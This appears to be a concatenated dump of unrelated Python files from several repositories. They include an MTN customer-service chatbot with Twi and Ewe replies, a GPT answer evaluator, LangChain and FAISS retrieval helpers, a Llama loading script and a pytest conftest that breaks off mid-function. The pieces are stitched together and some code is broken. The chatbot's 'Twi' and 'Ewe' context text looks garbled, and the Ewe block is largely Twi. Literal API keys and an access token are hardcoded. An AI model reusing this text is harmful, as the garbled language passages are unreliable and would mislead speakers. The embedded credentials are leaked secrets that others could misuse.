MTN is a leading network service provider that offers a wide range of services, including mobile data, voice calls, and more. Our mission is to provide our customers with seamless connectivity and exceptional customer service.
User Queries:
1. How can I buy MTN data bundles?
2. Where can I locate the nearest MTN office?
3. Can you help me with information on MTN's international roaming services?
4. What are the steps to port my number to MTN network?
5. Is there a self-service app available for MTN customers?
6. What options are available for MTN postpaid users?
Feel free to ask any questions related to MTN services, and we'll be happy to assist you!
"""
context_twi = """
Context: MTN Network Service Provider
MTN yɛ ɔhaw bi mu bi a ɛwɔ nnidi mfitiase sɛ, na wɔde nkↄmmↄ no, nkↄmmↄnkↄmmↄ, nkutoo na nnidi mfitiase bi a ɛsↄ yɛ.
Yɛn asafo no yɛ sika akokↄkↄↄ no a, yegye nnidi nnidi bi ma wↄn atoↄ yↄnka no, na yↄn atete yie no adwuma.
Anidaso a Ɔbarima/Ɔbea no awↄ.
1. Me dↄ MTN dↄta baablu bↄmmobi?
2. Ɛhwↄ me soro MTN ofis firi ha?
3. Wo nni sika akawↄ, anaa wopɛ sika akawↄ wↄ MTN afa no?
4. Adwuma a wↄde nnidi no ↄhia no asomdwoe mu sika akawↄ?
5. Saa ara no, MTN mma adwuma no ↄde wo app akawↄ.
6. Afei dↄn sika akawↄ bɛn wo dↄm nni ho?
Saa nti, monka adↄyↄ ase a, ɛno yie no.
"""
context_ewe = """
Context: MTN Network Service Provider
MTN wɔ kwan no a ɛma nnidi mfitiase sɛ, nso ɛka ntwam. Sɛ ɛbɛma wo, moblɛ dɛta, asɔ wɔ nni kasa, na nsɛm bi a ɛbɛma wo. Yɛ kyerɛwfo a ɛma wɔbɛtumi aka ɔkwan, na yɛn atete nso ahyɛdeɛ.
Ɔbarima/Ɔbea Anidaso:
1. Menka sika nsu ma MTN nombɛ no, sɛnea ɛbɛyɛ a?
2. Ƌfeme de la miwo MTN ofis nyanya kple?
3. Ɛyɛ dometɔwo ɖeka nuto la gɔme MTN's international roaming afe?
4. Ɛyi wo de nutodzi wo MTN network nutolu ɖekawo gake?
5. Ɛsiwɔsia yeye dzi wo ame do ŋu nɔ na ɖekawo fawo MTN nombɛ nɔ wɔe?
6. Ata wotutuwo kple MTN postpaid nombɛ nɔ nuto wo me?
Wobɛkɔ ɛpam ɔbarima/Ɔbea Anidaso mu ase, na yɛbɛsie wo.
"""
twi_dict = {
"hello": "Hello, yɛma wo akwaaba ba MTN customer service, yɛbɛyɛ dɛn aboa wo nnɛ?",
"mɛyɛ dɛn atɔ mtn data":"Yɛda mo ase sɛ moakɔ yɛn nkyɛn. Sɛ wopɛ mmoa wɔ airtime a wobɛtɔ anaasɛ credit ma wo MTN nɔma a, yɛsrɛ wo frɛ '*143#' fi wo fon so. Sɛ worehyia nsɛmnsɛm wɔ wo nkrataahyɛ ho a, wobɛtumi akɔ yɛn adetɔfoɔ mmoa nkyɛn",
"ɛhe na metumi ahwehwɛ mtn office":"",
"Me ntumi nnya intanɛt nkitahodi mfiri me sim card so":"Yɛpa kyɛw wɔ ɔhaw no ho. Yɛsrɛ wo hwɛ hu sɛ wo data nhyehyɛe no yɛ adwuma na wɔahyehyɛ wo mfiri no yiye sɛnea ɛbɛyɛ a ɛbɛkɔ intanɛt so. Sɛ asɛm no kɔ so a, yɛsrɛ wo, di yɛn atɔfo adwumayɛfo kuw no nkitaho na woanya mmoa foforo. Meda wo ase.",
}
ewe_dict = {
"hello": "Mido gbe na wò, míexɔ wò nyuie ɖe MTN ƒe asisiwo ƒe dɔwɔƒe, aleke míate ŋu akpe ɖe ŋuwò egbea?",
"aleke mawɔ aƒle mtn data bundle":"Akpe na mi be miedo asi ɖe mía gbɔ. Ne èdi kpekpeɖeŋu le yameʋuɖoɖo ƒeƒle alo credit na wò MTN xexlẽdzesi la, taflatse ƒo '*143#' tso wò fon dzi. Ne kuxiwo le fu ɖem na wò le wò nudɔdɔ ŋu la, àte ŋu aɖo míaƒe asisiwo ƒe kpekpeɖeŋunadɔa gbɔ",
"afi kae mate ŋu akpɔ mtn ɔfis le":"",
"Nyemete ŋu xɔ internet kadodo tso nye sim card dzi o":"Míeɖe kuku ɖe fuɖenamea ta. Taflatse kpɔ egbɔ be wò nyatakakawo ƒe ɖoɖoa le dɔ wɔm eye be woɖo wò mɔ̃a nyuie be wòate ŋu age ɖe internet dzi. Ne nyaa gakpɔtɔ li la, taflatse te ɖe míaƒe asisiwo ƒe dɔwɔƒea ŋu hena kpekpeɖeŋu bubuwo. Akpe na wò.",
}
# Select the appropriate context based on the chosen language
if language == "English":
context = context_en
elif language == "Twi":
context = context_twi
elif language == "Ewe":
context = context_ewe
else:
context = context_en # Default to English if the language is not recognized
# Create a prompt that includes the user's input, context, and desired language
prompt = f"{context}\nLanguage: {language}\nUser Input: {user_input}\nResponse:"
response = ""
if language == "English":
# Make a request to the OpenAI GPT API to generate a response
response = openai.Completion.create(
engine="gpt-3.5-turbo-instruct", # You can choose the engine that suits your needs
prompt=prompt,
max_tokens=50, # Adjust the max_tokens as needed
n=1 # You can generate multiple responses and choose the best one if needed
)
elif language == "Twi":
response = twi_dict.get(user_input)
elif language == "Ewe":
response = ewe_dict.get(user_input)
chatbot_reply = ""
if language == "English":
chatbot_reply = response.choices[0].text.strip()
else:
chatbot_reply = response
audio_response_path = ""
if input_type == "voice":
audio_response_path = text_to_audio(chatbot_reply, language)
elif input_type == "text":
audio_response_path = chatbot_reply
return audio_response_path
def text_to_audio(text, language):
# Convert the chatbot response text to an audio file
final_audio_response_path = ""
if language == "English":
final_audio_response_path = text_to_audio_en(text)
elif language == "Twi":
timestamp = datetime.now().strftime("%Y%m%d%H%M%S")
audio_response_filename = f"audio_response_{timestamp}.mp3"
# Define the full path to save the audio file in the media directory
audio_response_path = os.path.join(
settings.MEDIA_ROOT, audio_response_filename)
# api = TTS("tts_models/tw_asante/openbible/vits")
speaker_encoder_twi = speaker_encoder_model_twi
# speaker_encoder_ewe = speaker_encoder_model_ewe
# speaker_encoder_twi.tts_with_vc_to_file(
# text,
# speaker_wav="/Users/m1macbookpro2020/Desktop/samuel/final year project/VCABuddy/chat/speaker.mp3",
# file_path=audio_response_path
# )
speaker_encoder_twi.tts_to_file(
text,
# speaker_wav="/Users/m1macbookpro2020/Desktop/samuel/final year project/VCABuddy/chat/speaker.mp3",
file_path=audio_response_path
)
final_audio_response_path = os.path.relpath(
audio_response_path, settings.MEDIA_ROOT)
elif language == "Ewe":
timestamp = datetime.now().strftime("%Y%m%d%H%M%S")
audio_response_filename = f"audio_response_{timestamp}.mp3"
# Define the full path to save the audio file in the media directory
audio_response_path = os.path.join(
settings.MEDIA_ROOT, audio_response_filename)
# api = TTS("tts_models/tw_asante/openbible/vits")
speaker_encoder_ewe = speaker_encoder_model_ewe
# speaker_encoder_ewe = speaker_encoder_model_ewe
speaker_encoder_ewe.tts_to_file(
text,
# speaker_wav="/Users/m1macbookpro2020/Desktop/samuel/final year project/VCABuddy/chat/speaker.mp3",
file_path=audio_response_path
)
# speaker_encoder_ewe.tts_with_vc_to_file(
# text,
# speaker_wav="/Users/m1macbookpro2020/Desktop/samuel/final year project/VCABuddy/chat/speaker.mp3",
# file_path=audio_response_path
# )
final_audio_response_path = os.path.relpath(
audio_response_path, settings.MEDIA_ROOT)
# Return the relative path to the audio file
return final_audio_response_path
def text_to_audio_en(text):
# Convert the chatbot response text to an audio file
timestamp = datetime.now().strftime("%Y%m%d%H%M%S")
audio_response_filename = f"audio_response_{timestamp}.mp3"
# Define the full path to save the audio file in the media directory
audio_response_path = os.path.join(
settings.MEDIA_ROOT, audio_response_filename)
audio_response = gTTS(text)
audio_response.save(audio_response_path)
# Return the relative path to the audio file
return os.path.relpath(audio_response_path, settings.MEDIA_ROOT)
if __name__ == "__main__":
# Replace with the user's text input
user_input = "Hello, chatbot. How can I assist you?"
chatbot = Chatbot()
chatbot_response = chatbot.get_response(user_input)
audio_response_path = text_to_audio(chatbot_response)
# Now you can send the 'audio_response_path' to the frontend for playback.
| [
"PLACEHOLDER\nLanguage: PLACEHOLDER\nUser Input: PLACEHOLDER\nResponse:"
] |
2024-01-10 | xieyxclack/data-juicer | tools~evaluator~gpt_eval~gpt_evaluator.py | # Some code here has been modified from:
# https://github.com/lm-sys/FastChat
# --------------------------------------------------------
import jsonlines
import openai
import logging
import time
import argparse
import yaml
import os
from multiprocessing import Pool
from tqdm import tqdm
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--config', type=str, required=True,
help="Config file path")
parser.add_argument('--worker-num', type=int, default=4,
help="Number of workers for OpenAI API")
parser.add_argument("--max-retry", type=int, default=5,
help='Retry times for OpenAI API')
parser.add_argument("--debug", action='store_true',
help='Run without calling OpenAI API')
return parser.parse_args()
class GPTEvaluator():
def __init__(self, config):
openai.organization = config['openai_organization']
openai.api_key = config['openai_api_key']
self.questions = [q for q in jsonlines.open(
config['question_file'], 'r')]
self.answers = [a for a in jsonlines.open(
config['answer_file'], 'r')]
self.baseline = [b for b in jsonlines.open(
config['baseline_file'], 'r')]
self.prompt_templates = {
p['category']: p for p in jsonlines.open(config['prompt_file'], 'r')}
self.reviewers = {
z['category']: z for z in jsonlines.open(config['reviewer_file'], 'r')}
if not os.path.exists(os.path.dirname(config['result_file'])):
os.makedirs(os.path.dirname(config['result_file']))
self.result_writer = jsonlines.open(
config['result_file'], 'w', flush=True)
self.worker_num = config['worker_num'] if 'worker_num' in config else 4
self.max_retry = config['max_retry'] if 'max_retry' in config else 5
self.debug = config['debug'] if 'debug' in config else False
def generate_prompt(self, question, answer, baseline, prompts):
if question['category'] in self.reviewers.keys():
reviewer = self.reviewers[question['category']]
prompt_json = prompts[question['category']]
else:
reviewer = self.reviewers['general']
prompt_json = prompts['general']
sys_prompt = prompt_json["system_prompt"]
prompt_template = prompt_json["prompt_template"]
defaults = prompt_json["defaults"]
prompt1 = prompt_template.format(
question=question['text'], answer_1=answer['text'], answer_2=baseline['text'], **defaults
)
prompt2 = prompt_template.format(
question=question['text'], answer_1=baseline['text'], answer_2=answer['text'], **defaults
)
return sys_prompt, prompt1, prompt2, reviewer
def parse_score(self, review):
review = review.strip('\n')
score_pair = review.split("\n")[-1]
        score_pair = score_pair.strip()
sp = score_pair.split(",")
try:
if len(sp) == 2:
return [float(sp[0]), float(sp[1])]
else:
logger.error(
f"Invalid score pair."
)
return [0, 0]
except Exception as e:
logger.error("Invalid answer")
return [0, 0]
def run(self):
results = []
requests = []
question_num = len(self.questions)
for i in range(question_num):
sys_prompt, prompt1, prompt2, reviewer = self.generate_prompt(
self.questions[i], self.answers[i], self.baseline[i], self.prompt_templates)
results.append({
'question_id': self.questions[i]['question_id'],
'metadata': reviewer['metadata'],
'model1': self.answers[i]['model_id'],
'model2': self.baseline[i]['model_id']
})
requests.append({
'sys_prompt': sys_prompt, 'user_prompt': prompt1, 'temperature': reviewer['metadata']['temperature'], 'max_tokens': reviewer['metadata']['max_tokens'], 'model': reviewer['metadata']['model'], 'debug': self.debug, 'retry': self.max_retry})
requests.append({
'sys_prompt': sys_prompt, 'user_prompt': prompt2, 'temperature': reviewer['metadata']['temperature'], 'max_tokens': reviewer['metadata']['max_tokens'], 'model': reviewer['metadata']['model'], 'debug': self.debug, 'retry': self.max_retry})
        # create the worker pool once, after all review requests have been built
        pool = Pool(processes=self.worker_num)
        reviews = pool.map(eval, requests)
target_score = 0.0
baseline_score = 0.0
cnt = 0
for i, review in enumerate(tqdm(reviews)):
scores = self.parse_score(review)
idx = i // 2
if i % 2 == 0:
results[idx]['review1'] = review
results[idx]['score1'] = scores
target_score += scores[0]
baseline_score += scores[1]
else:
results[idx]['review2'] = review
results[idx]['score2'] = scores
target_score += scores[1]
baseline_score += scores[0]
self.result_writer.write(results[idx])
cnt += 1
target_avg_score = target_score / cnt / 2
baseline_avg_score = baseline_score / cnt / 2
print("-------------------------")
print(f"> {results[0]['model1']}: {target_avg_score}")
print(f"> {results[0]['model2']}: {baseline_avg_score}")
print("-------------------------")
self.result_writer.write({
f"{results[0]['model1']}": target_avg_score,
f"{results[0]['model2']}": baseline_avg_score
})
self.result_writer.close()
def eval(request):
if request['debug']:
logger.info(f"Fake response {request['user_prompt']}")
return "Fake response\n10,9\n"
for _ in range(request['retry']):
try:
response = openai.ChatCompletion.create(
model=request['model'],
messages=[
{"role": "system", "content": request['sys_prompt']},
{
"role": "user",
"content": request['user_prompt'],
},
],
temperature=request['temperature'],
max_tokens=request['max_tokens'],
)
content = response["choices"][0]["message"]["content"]
logger.info(content)
return content
except Exception as e:
logger.error(e)
time.sleep(5)
logger.error(f"Failed after {request['retry']} retries.")
return "error"
if __name__ == "__main__":
args = parse_args()
config = yaml.safe_load(open(args.config, 'r', encoding='utf-8'))['gpt_evaluation']
config['worker_num'] = args.worker_num
config['max_retry'] = args.max_retry
config['debug'] = args.debug
evaluator = GPTEvaluator(config)
evaluator.run()
| [
"user_prompt",
"general",
"sys_prompt",
"prompt_template",
"system_prompt"
] |
2024-01-10 | chelleai/lloom | lloom~dataset~textfile_dataset.py | import glob
import uuid
from chromadb.api import Collection
from langchain.text_splitter import RecursiveCharacterTextSplitter
class TextfileDataset:
def __init__(
self,
source: str,
tokens_per_document: int,
token_overlap: int,
collection: Collection,
count: int = None,
):
self.source = source
self.tokens_per_document = tokens_per_document
self.token_overlap = token_overlap
self.collection = collection
self.count = count
def load(self):
file_paths = glob.glob(self.source)
if not file_paths:
raise ValueError("No files found matching the provided glob pattern.")
        ids = []
        all_document_texts = []
for file_path in file_paths:
with open(file_path, "r") as file:
document_text = file.read()
splitter = RecursiveCharacterTextSplitter(
chunk_size=self.tokens_per_document,
chunk_overlap=self.token_overlap,
length_function=len,
add_start_index=True,
)
document_texts = splitter.split_text(
text=document_text,
)
            ids += [str(uuid.uuid4()) for _ in range(len(document_texts))]
            all_document_texts += document_texts
        # add the chunks from every file so ids and documents stay aligned
        self.collection.add(ids=ids, documents=all_document_texts)
return ids
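# Minimal usage sketch (assumptions: chromadb is installed and "./corpus/*.txt" is an
# illustrative glob pattern; neither the pattern nor the collection name comes from the
# original file).
if __name__ == "__main__":
    import chromadb

    client = chromadb.Client()
    demo_collection = client.create_collection("textfile_demo")
    dataset = TextfileDataset(
        source="./corpus/*.txt",
        tokens_per_document=500,
        token_overlap=50,
        collection=demo_collection,
    )
    chunk_ids = dataset.load()
    print(f"Indexed {len(chunk_ids)} chunks")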
| [] |
2024-01-10 | chelleai/lloom | tests~test_parser.py | from chromadb.utils.embedding_functions import OpenAIEmbeddingFunction
from lloom import Migration
from lloom.dataset.textfile_dataset import TextfileDataset
def test_migration():
m = Migration(file_path="tests/sotu-small.yml")
m.run_migration()
assert isinstance(m.datasets["sotu_raw"], TextfileDataset)
assert m.stores["sotu_db"].count() == 1
coll = m.stores["sotu_db"]
assert isinstance(coll._embedding_function, OpenAIEmbeddingFunction)
| [] |
2024-01-10 | Dev-Khant/tell-what-a-video-does | process~qa_bot.py | import logging
from langchain.docstore.document import Document
from langchain.text_splitter import CharacterTextSplitter
from langchain.embeddings import OpenAIEmbeddings
from langchain.vectorstores import Chroma
from langchain.chat_models import ChatOpenAI
from langchain.chains import RetrievalQA
from langchain.prompts import PromptTemplate
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("Q&A")
class QA_Bot:
def __init__(self, openai_key):
self.openai_key = openai_key
self.llm = ChatOpenAI(
temperature=0.3, model_name="gpt-3.5-turbo", openai_api_key=openai_key
)
self.agent = None
def store_in_vectordb(self, explanation):
document = Document(page_content=explanation)
text_splitter = CharacterTextSplitter(chunk_size=100, chunk_overlap=10)
chunked_documents = text_splitter.split_documents([document])
logger.info("Documents ready")
vectordb = Chroma.from_documents(
chunked_documents,
embedding=OpenAIEmbeddings(openai_api_key=self.openai_key),
persist_directory="./data",
)
vectordb.persist()
logger.info("Documents inserted to vectordb")
self.agent = RetrievalQA.from_chain_type(
llm=self.llm,
retriever=vectordb.as_retriever(search_kwargs={"k": 3}),
)
logger.info("Agent ready!!")
def retrieve(self, query):
result = self.agent({"query": query}, return_only_outputs=True)
logger.info("Result ready!")
return result["result"]
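# Minimal usage sketch (assumptions: a valid OpenAI key in the OPENAI_API_KEY environment
# variable and an illustrative explanation string; neither is part of the original file).
if __name__ == "__main__":
    import os

    bot = QA_Bot(openai_key=os.environ["OPENAI_API_KEY"])
    bot.store_in_vectordb("The video shows how to install the library and run the demo notebook.")
    print(bot.retrieve("What does the video demonstrate?"))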
| [] |
2024-01-10 | dmussaku/rates-chatgpt | rates~clients.py | import json
from typing import Dict
import openai
from django.conf import settings
from .models import ContainerTypes
class OpenAIClient(object):
def __init__(self):
openai.api_key = settings.OPENAI_API_KEY
def create_context(self):
container_types = ContainerTypes.choices
default_container_type = ContainerTypes.TWENTY_FOOTER
return f"""
Context:
We are a global logistics company that transports containers over sea.
Return me only a json with the following format:
- pol: Find the closest sea port of leave and return an object of the following format:
- name: name of the port
- code: UN/LOCODE of the port
- country_code: ISO 3166-1 alpha-2 country code
- pod: Find the closest sea port of destination and return an object of the following format:
- name: name of the port
- code: UN/LOCODE of the port
- country_code: ISO 3166-1 alpha-2 country code
- containers: list of objects of the following format:
- amount: integer Amount of containers, 1 by default
- type: string enumerated from the following values: {container_types}. {default_container_type} by default
- goods_names: Array of strings. names of the goods. [] by default
- is_dangerous: boolean field, false by default. Dangerous goods are considered dangerous when transporting via sea.
- is_hazardous: boolean field, false by default. Hazardous materials such as explosives, flammable liquids and gases, and toxic substances are considered dangerous when transporting via sea.
- is_customs_needed: boolean field, false by default. Indicate whether any of the goods require customs clearance.
- is_fragile: boolean field, false by default. Indicate whether any of the goods are fragile.
Don't add any other fields to the json sturcture from the question. Make sure the structure from the context is maintained.
"""
def get_answer(self, question) -> Dict:
context = self.create_context()
prompt = f"Question: {question}\n{context}"
print(prompt)
response = openai.Completion.create(
model="text-davinci-003",
prompt=prompt,
temperature=0.9,
max_tokens=512,
top_p=1,
frequency_penalty=0,
presence_penalty=0,
)
print("-" * 80)
print(response)
print("-" * 80)
text = response.choices[0]["text"].replace("\n", "")
if text.startswith("Answer:"):
            # str.strip() removes a set of characters, not a prefix; slice off the label instead
            text = text[len("Answer:"):]
json_response = json.loads(text.strip())
print(json_response)
print("-" * 80)
return json_response
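# Minimal usage sketch (assumption: called from Django code where settings.OPENAI_API_KEY is
# configured; the shipment description below is illustrative only):
#
#     client = OpenAIClient()
#     answer = client.get_answer(
#         "Ship two 40ft containers of furniture from Shanghai to Rotterdam"
#     )
#     # answer is a dict with pol, pod and containers keys parsed from the model output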
| [
"Question: PLACEHOLDER\nPLACEHOLDER"
] |
2024-01-10 | shubhagrawal30/FAST | FASTphysics~tutor~tutor.py | from openai import OpenAI
import os, sys
import streamlit as st
from . import prompts
client = OpenAI(api_key=st.secrets["OPENAI_API_KEY"])
class Tutor():
def __init__(self):
p = prompts.Prompts()
self.subject = p.SUBJECT()
self.history = [{"role": "system", "content": p.INIT_PROMPT()}, \
{"role": "user", "content": p.FIRST_PROMPT()}]
def ask(self, question): # method is a generator method to allow streaming OpenAI responses
question = {"role": "user", "content": question}
self.history.append(question)
response = client.chat.completions.create(model="gpt-4", messages=self.history, stream=True)
collect_msgs = ""
for chunk in response:
msg = chunk.choices[0].delta.content or ""
collect_msgs += msg
yield msg
self.history.append({"role": "assistant", "content": collect_msgs})
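# Minimal usage sketch (assumptions: the module is imported inside the Streamlit app with
# OPENAI_API_KEY available in st.secrets, and the question below is illustrative).
# ask() is a generator that yields streamed chunks, so the reply is consumed with a loop:
#
#     tutor = Tutor()
#     reply = "".join(chunk for chunk in tutor.ask("What is Newton's second law?"))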
| [] |
2024-01-10 | rohanpatankar926/chatbot-client | fasiss_handlers.py | from langchain.vectorstores import FAISS
from langchain.text_splitter import RecursiveCharacterTextSplitter
from langchain.llms import OpenAI
from langchain.chains import RetrievalQA
from langchain.embeddings.openai import OpenAIEmbeddings
from dotenv import load_dotenv
from tqdm import tqdm
import hashlib
load_dotenv()
from langchain.document_loaders import PDFMinerLoader
from utils import config_loader
from langchain.chains.question_answering import load_qa_chain
class Document:
def __init__(self, page_content, metadata):
self.page_content = page_content
self.metadata = metadata
def __call__(self):
return f"Document(page_content={self.page_content},metadata={self.metadata})"
def get_pagecontent(self):
return self.page_content
def get_metadata(self):
        return self.metadata
def pdf_to_json_and_insert(filepath):
documents=[]
loader = PDFMinerLoader(filepath)
docs = loader.load()
text_splitter = RecursiveCharacterTextSplitter(
chunk_size=1000,
chunk_overlap=200,
length_function = len,
separators=["\n\n", "\n", " ", ""],
)
m = hashlib.md5() # this will convert URL into unique ID
for doc in tqdm(docs):
url = doc.metadata["source"].split("/")[-1]
m.update(url.encode("utf-8"))
chunks = text_splitter.split_text(doc.page_content)
for i, chunk in enumerate(chunks):
doc = Document(page_content=chunk, metadata={"source":url})
documents.append(
doc
)
embedding = openai_embedding()
global knowledge_base
knowledge_base = FAISS.from_documents(documents=documents,
embedding=embedding)
return knowledge_base
def openai_embedding():
model_name = config_loader["openai_embedding_model"]
embed = OpenAIEmbeddings(
model=model_name,
openai_api_key="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",
)
return embed
def retriever_faiss(query):
retrieve=knowledge_base.similarity_search(query=query)
llm = OpenAI(openai_api_key="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")
chain = load_qa_chain(llm, chain_type='map_rerank')
return chain.run(input_documents=retrieve, question=query)
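# Minimal usage sketch (assumption: "./docs/manual.pdf" is an illustrative path, not part of
# the original file). pdf_to_json_and_insert builds the FAISS index that retriever_faiss
# then queries.
if __name__ == "__main__":
    pdf_to_json_and_insert("./docs/manual.pdf")
    print(retriever_faiss("What topics does the manual cover?"))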
| [] |
2024-01-10 | rohanpatankar926/chatbot-client | llama-2.py | from torch import cuda, bfloat16
import transformers
model_id = 'decapoda-research/llama-7b-hf'
device = f'cuda:{cuda.current_device()}' if cuda.is_available() else 'cpu'
# set quantization configuration to load large model with less GPU memory
# this requires the `bitsandbytes` library
bnb_config = transformers.BitsAndBytesConfig(
load_in_4bit=True,
bnb_4bit_quant_type='nf4',
bnb_4bit_use_double_quant=True,
bnb_4bit_compute_dtype=bfloat16
)
# begin initializing HF items, you need an access token
hf_auth = "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"
model_config = transformers.AutoConfig.from_pretrained(
model_id,
use_auth_token=True,
)
model = transformers.AutoModelForCausalLM.from_pretrained(
model_id,
trust_remote_code=True,
config=model_config,
quantization_config=bnb_config,
device_map='auto',
use_auth_token=hf_auth,
)
# enable evaluation mode to allow model inference
model.eval()
print(f"Model loaded on {device}")
tokenizer = transformers.AutoTokenizer.from_pretrained(
model_id,
use_auth_token=hf_auth
)
stop_list = ['\nHuman:', '\n```\n']
stop_token_ids = [tokenizer(x)['input_ids'] for x in stop_list]
stop_token_ids
import torch
stop_token_ids = [torch.LongTensor(x).to(device) for x in stop_token_ids]
stop_token_ids
from transformers import StoppingCriteria, StoppingCriteriaList
# define custom stopping criteria object
class StopOnTokens(StoppingCriteria):
def __call__(self, input_ids: torch.LongTensor, scores: torch.FloatTensor, **kwargs) -> bool:
for stop_ids in stop_token_ids:
if torch.eq(input_ids[0][-len(stop_ids):], stop_ids).all():
return True
return False
stopping_criteria = StoppingCriteriaList([StopOnTokens()])
generate_text = transformers.pipeline(
model=model,
tokenizer=tokenizer,
return_full_text=True, # langchain expects the full text
task='text-generation',
# we pass model parameters here too
stopping_criteria=stopping_criteria, # without this model rambles during chat
temperature=0.1, # 'randomness' of outputs, 0.0 is the min and 1.0 the max
max_new_tokens=512, # max number of tokens to generate in the output
repetition_penalty=1.1 # without this output begins repeating
)
res = generate_text("Explain me the difference between Data Lakehouse and Data Warehouse.")
print(res[0]["generated_text"])
from langchain.llms import HuggingFacePipeline
llm = HuggingFacePipeline(pipeline=generate_text)
# checking again that everything is working fine
print(llm(prompt="Explain me the difference between Data Lakehouse and Data Warehouse."))
| [] |
2024-01-10 | boromir674/topic-modeling-toolkit | tests~conftest.py | import os
import sys
from configparser import ConfigParser
import pytest
from functools import reduce
from collections import Counter, OrderedDict
from topic_modeling_toolkit.patm import CoherenceFilesBuilder, TrainerFactory, Experiment, Tuner, PipeHandler, political_spectrum as political_spectrum_manager
# import topic_modeling_toolkit as tmtk
#
# from tmtk.patm import CoherenceFilesBuilder, TrainerFactory, Experiment, Tuner, PipeHandler
#
# from tmtk.patm import political_spectrum as political_spectrum_manager
from topic_modeling_toolkit.processors import Pipeline
# from tmtk.processors import Pipeline
from topic_modeling_toolkit.reporting import GraphMaker, TopicsHandler, DatasetReporter, ResultsHandler
from topic_modeling_toolkit.results import ExperimentalResults
####################3
MODULE_DIR = os.path.dirname(os.path.realpath(__file__))
DATA_DIR = os.path.join(MODULE_DIR, 'data')
TRAIN_CFG = os.path.join(MODULE_DIR, 'test-train.cfg')
REGS_CFG = os.path.join(MODULE_DIR, 'test-regularizers.cfg')
TEST_COLLECTIONS_ROOT_DIR_NAME = 'unittests-collections'
TEST_COLLECTION = 'unittest-dataset'
MODEL_1_LABEL = 'test-model'
TUNE_LABEL_PREFIX = 'unittest'
#####################
@pytest.fixture(scope='session')
def unittests_data_dir():
return DATA_DIR
@pytest.fixture(scope='session')
def collections_root_dir(tmpdir_factory):
return str(tmpdir_factory.mktemp(TEST_COLLECTIONS_ROOT_DIR_NAME))
@pytest.fixture(scope='session')
def test_collection_name():
return TEST_COLLECTION
#
@pytest.fixture(scope='session')
def rq1_cplsa_results_json(unittests_data_dir):
"""These are the results gathered for a cplsa trained model"""
return os.path.join(unittests_data_dir, 'cplsa100000_0.2_0.json')
@pytest.fixture(scope='session')
def test_collection_dir(collections_root_dir, test_collection_name, tmpdir_factory):
if not os.path.isdir(os.path.join(collections_root_dir, test_collection_name)):
os.mkdir(os.path.join(collections_root_dir, test_collection_name))
return os.path.join(collections_root_dir, test_collection_name)
# return str(tmpdir_factory.mktemp(os.path.join(collections_root_dir, test_collection_name)))
# return os.path.join(collections_root_dir, TEST_COLLECTION)
@pytest.fixture(scope='session')
def results_handler(collections_root_dir):
return ResultsHandler(collections_root_dir, results_dir_name='results')
@pytest.fixture(scope='session')
def pairs_file_nb_lines(): # number of lines in cooc and ppmi files. Dirty code to support python 2 backwards compatibility
python3 = {True: [1215, 1347], # second value is expected in travis build with python3
False: [1255]}
return python3[2 < sys.version_info[0]]
@pytest.fixture(scope='session')
def pipe_n_quantities(test_collection_dir, pairs_file_nb_lines):
return {'unittest-pipeline-cfg': os.path.join(MODULE_DIR, 'test-pipeline.cfg'),
'unittest-collection-dir': test_collection_dir,
'category': 'posts',
'sample': 200,
'resulting-nb-docs': 200,
'nb-bows': 2765,
'word-vocabulary-length': 1347,
'nb-all-modalities-terms': 1348, # corresponds to the number of lines in the vocabulary file created (must call persist of PipeHandler with add_class_labels_to_vocab=True, which is the default).
# the above probably will fail in case no second modality is used (only the @default_class is enabled)
'nb-lines-cooc-n-ppmi-files': pairs_file_nb_lines
}
@pytest.fixture(scope='session')
def political_spectrum():
return political_spectrum_manager
#### OPERATIONS ARTIFACTS
@pytest.fixture(scope='session')
def preprocess_phase(pipe_n_quantities):
pipe_handler = PipeHandler()
pipe_handler.process(pipe_n_quantities['unittest-pipeline-cfg'], pipe_n_quantities['category'], sample=pipe_n_quantities['sample'])
return pipe_handler
@pytest.fixture(scope='session')
def test_dataset(preprocess_phase, political_spectrum, test_collection_dir):
"""A dataset ready to be used for topic modeling training. Depends on the input document sample size to take and resulting actual size"""
text_dataset = preprocess_phase.persist(test_collection_dir, political_spectrum.poster_id2ideology_label, political_spectrum.class_names, add_class_labels_to_vocab=True)
coh_builder = CoherenceFilesBuilder(test_collection_dir)
coh_builder.create_files(cooc_window=10, min_tf=0, min_df=0, apply_zero_index=False)
return text_dataset
# PARSE UNITTEST CFG FILES
def parse_cfg(cfg):
config = ConfigParser()
config.read(cfg)
return {section: dict(config.items(section)) for section in config.sections()}
@pytest.fixture(scope='session')
def train_settings():
"""These settings (learning, reg components, score components, etc) are used to train the model in 'trained_model' fixture. A dictionary of cfg sections mapping to dictionaries with settings names-values pairs."""
_ = parse_cfg(TRAIN_CFG)
_['regularizers'] = {k: v for k, v in _['regularizers'].items() if v}
_['scores'] = {k: v for k, v in _['scores'].items() if v}
return _
@pytest.fixture(scope='session')
def trainer(collections_root_dir, test_dataset):
return TrainerFactory().create_trainer(os.path.join(collections_root_dir, test_dataset.name), exploit_ideology_labels=True, force_new_batches=True)
@pytest.fixture(scope='session')
def trained_model_n_experiment(collections_root_dir, test_dataset, trainer):
experiment = Experiment(os.path.join(collections_root_dir, test_dataset.name))
topic_model = trainer.model_factory.create_model(MODEL_1_LABEL, TRAIN_CFG, reg_cfg=REGS_CFG, show_progress_bars=False)
train_specs = trainer.model_factory.create_train_specs()
trainer.register(experiment)
experiment.init_empty_trackables(topic_model)
trainer.train(topic_model, train_specs, effects=False, cache_theta=True)
experiment.save_experiment(save_phi=True)
return topic_model, experiment
@pytest.fixture(scope='session')
def loaded_model_n_experiment(collections_root_dir, test_dataset, trainer, trained_model_n_experiment):
model, experiment = trained_model_n_experiment
experiment.save_experiment(save_phi=True)
new_exp_obj = Experiment(os.path.join(collections_root_dir, test_dataset.name))
trainer.register(new_exp_obj)
loaded_model = new_exp_obj.load_experiment(model.label)
return loaded_model, new_exp_obj
@pytest.fixture(scope='session')
def training_params():
return [
('nb-topics', [10, 12]),
('collection-passes', 4),
('document-passes', 1),
('background-topics-pct', 0.2),
('ideology-class-weight', 1),
('default-class-weight', 1)
]
@pytest.fixture(scope='session')
def expected_explorable_params(training_params, regularizers_specs):
return [(k, v) for k, v in training_params if type(v) == list and len(v) != 1] + [('{}.{}'.format(k, param), value) for k, v in regularizers_specs for param, value in v if type(value) == list and len(value) != 1]
@pytest.fixture(scope='session')
def expected_constant_params(training_params, regularizers_specs):
